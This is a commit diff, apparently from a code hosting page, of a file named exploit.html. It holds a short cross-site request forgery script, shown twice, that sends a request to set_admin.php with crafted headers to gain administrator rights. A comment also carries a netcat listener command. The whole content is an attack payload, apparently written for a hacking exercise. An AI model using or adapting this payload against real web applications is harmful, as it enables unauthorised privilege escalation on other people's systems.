DavidMah · February 2, 2013 01:09
diff --git a/exploit.html b/exploit.html
 <!-- CSRF through the mail function?-->
 <!-- sudo nc -lk 80-->
 <script>
 var oReq = new window.XMLHttpRequest;
    oReq.open("GET", "set_admin.php", true);
    oReq.setRequestHeader("user", "bad");
    oReq.setRequestHeader("Set", "Set");
    function handler(data) {
      console.log($(oReq.responseText))
    }
    oReq.onreadystatechange = handler
    oReq.send();
 </script>
	<!-- CSRF through the mail function?-->
	<!-- sudo nc -lk 80-->
	<script>
	var oReq = new window.XMLHttpRequest;
	oReq.open("GET", "set_admin.php", true);
	oReq.setRequestHeader("user", "bad");
	oReq.setRequestHeader("Set", "Set");
	function handler(data) {
	console.log($(oReq.responseText))
	}
	oReq.onreadystatechange = handler
	oReq.send();
	</script>
No results found